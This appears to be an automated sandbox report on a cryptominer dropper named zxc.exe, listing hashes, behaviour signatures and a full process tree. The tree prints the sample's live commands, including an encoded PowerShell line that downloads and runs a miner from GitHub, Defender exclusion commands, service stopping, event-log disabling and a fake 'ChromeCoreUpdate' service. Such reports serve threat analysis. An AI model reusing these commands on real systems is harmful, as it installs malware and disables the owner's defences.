Analysis

  • max time kernel
    1800s
  • max time network
    1803s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21-11-2024 19:36

General

  • Target

    zxc.exe

  • Size

    6KB

  • MD5

    1037e4868002ea28986b067e602219d5

  • SHA1

    eb606ee00af1c8e3982d827819feb020e552602e

  • SHA256

    cc938a7173b4bf5863d698d322be43378d520bdea430a390496b016c85410706

  • SHA512

    4924969ef9398f3a45ada5dfbaeab93d92d761100fd174075b53fbfe116738b31bc338a904a102631a7239ee8f82b8bd3ca222053385fb686820ef543ea6e183

  • SSDEEP

    96:TH79mNb60qvjnMmt3VI9dXlO5NzO6M8Ac/h6zanF3d3oj4rl:P9gqvjn3QdXlWNzOH8Ac/hT3d/

Malware Config

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 63 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:404
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:680
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:968
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:452
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:616
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1040
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1048
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1180
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1192
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1252
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1288
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1412
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1420
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2804
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1560
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1572
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1688
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1712
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1756
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1836
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1896
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2036
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1132
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1984
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2052
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2240
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2332
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2468
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2476
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2532
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2624
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2648
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2664
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2676
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2684
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2784
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3084
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of UnmapMainImage
                                                                            PID:3184
                                                                            • C:\Users\Admin\AppData\Local\Temp\zxc.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\zxc.exe"
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1648
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgByAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB2AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3AHMAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBCAHkAdABlAHIAQwBvAGQAZQAvAG0AaQBuAGUAcgAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBtAGkAbgBlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBrAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHoAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBxAHUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApACkAPAAjAHgAcgBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAaQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHgAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApADwAIwBkAHYAdAAjAD4A"
                                                                                3⤵
                                                                                • Blocklisted process makes network request
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3472
                                                                                • C:\Users\Admin\AppData\Roaming\xdwd.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\xdwd.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:988
                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                    5⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2768
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    5⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1852
                                                                                    • C:\Windows\system32\wusa.exe
                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                      6⤵
                                                                                        PID:1884
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1960
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:704
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:444
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:4052
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2344
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                      5⤵
                                                                                      • Power Settings
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:640
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                      5⤵
                                                                                      • Power Settings
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2264
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                      5⤵
                                                                                      • Power Settings
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:584
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                      5⤵
                                                                                      • Power Settings
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4320
                                                                                    • C:\Windows\system32\dialer.exe
                                                                                      C:\Windows\system32\dialer.exe
                                                                                      5⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1224
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe delete "ChromeCoreUpdate"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1740
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe create "ChromeCoreUpdate" binpath= "C:\ProgramData\Updater\Updater32.exe" start= "auto"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1080
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1696
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe start "ChromeCoreUpdate"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2836
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        6⤵
                                                                                          PID:3736
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3396
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  1⤵
                                                                                    PID:3412
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3836
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                      1⤵
                                                                                        PID:3912
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3924
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:4024
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4260
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                            1⤵
                                                                                              PID:4348
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                              1⤵
                                                                                                PID:2132
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:4856
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1284
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4828
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:1880
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:1528
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:4568
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:2288
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                          1⤵
                                                                                                            PID:2816
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:1404
                                                                                                            • C:\ProgramData\Updater\Updater32.exe
                                                                                                              C:\ProgramData\Updater\Updater32.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2928
                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:524
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                    PID:3984
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                  2⤵
                                                                                                                    PID:1168
                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      3⤵
                                                                                                                        PID:4192
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1432
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4932
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4356
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3180
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3284
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        3⤵
                                                                                                                          PID:1056
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                        2⤵
                                                                                                                        • Power Settings
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2720
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          3⤵
                                                                                                                            PID:5032
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                          2⤵
                                                                                                                          • Power Settings
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2120
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            3⤵
                                                                                                                              PID:1776
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5076
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              3⤵
                                                                                                                                PID:4716
                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                              2⤵
                                                                                                                              • Power Settings
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3740
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:4104
                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                C:\Windows\system32\dialer.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3036
                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                C:\Windows\system32\dialer.exe
                                                                                                                                2⤵
                                                                                                                                  PID:2260
                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                  dialer.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:632
                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                1⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                PID:2452
                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                                                1⤵
                                                                                                                                  PID:2460
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2460 -s 964
                                                                                                                                    2⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    PID:316
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:2384
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 408 -p 2460 -ip 2460
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                    PID:4420
                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2832
                                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                  1⤵
                                                                                                                                    PID:4704
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1728
                                                                                                                                    • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                      1⤵
                                                                                                                                        PID:2172
                                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:4600

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.07450f9e-4bc7-4e62-88ab-8c600cced2bf.tmp.txt

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          f79a9bdd247ed319c5b26379fb8b33d8

                                                                                                                                          SHA1

                                                                                                                                          251fe5533309e3d13df5f57f43016e99737c9600

                                                                                                                                          SHA256

                                                                                                                                          bd46277e462b3d9deac1f25864a149e41bdd59ab58c33a68dbca58d27747be53

                                                                                                                                          SHA512

                                                                                                                                          f7ac97fa8ece6ebbc1be769ca72928edfdea69e9dc31f85a81fcbd1492b0038bcac566628202dee62408f0d7b3a4d4e843a12f3e310cf645e5c11375b950d204

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.57dcdc42-35d1-46fe-a014-9df5369146d1.tmp.csv

                                                                                                                                          Filesize

                                                                                                                                          33KB

                                                                                                                                          MD5

                                                                                                                                          49167510c55a14cb9aca1894a15234f1

                                                                                                                                          SHA1

                                                                                                                                          bfcfba3a60ae0e0ad3cf735f9c49d1989b448760

                                                                                                                                          SHA256

                                                                                                                                          5ae400cd611e7f7fd37ce1a6ed120c619280162cb02b0bcf968d7ab60b2d635d

                                                                                                                                          SHA512

                                                                                                                                          7981a764c0876fdc8ecd1d15750e3a727f74435471b92af2c039693008f2949392c5b0936d73a9daa0c7d49ed23496e2604e0c618dc86b525cba565eb36a1f84

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                          Filesize

                                                                                                                                          3KB

                                                                                                                                          MD5

                                                                                                                                          aa0a32b11dca7b04f4cc5fe8c55cb357

                                                                                                                                          SHA1

                                                                                                                                          00e354fd0754a7d721a270cdc08f970b9a3f6605

                                                                                                                                          SHA256

                                                                                                                                          e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

                                                                                                                                          SHA512

                                                                                                                                          1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          10420cf62731439ef7e9a18c897e7acf

                                                                                                                                          SHA1

                                                                                                                                          88c97bdffaa9bc776c10c7da58f1c5296d56de2b

                                                                                                                                          SHA256

                                                                                                                                          63047e3ba9131f9aac465784f0b4bf69bde4a62074a240b9c214a3b7a80ea1e8

                                                                                                                                          SHA512

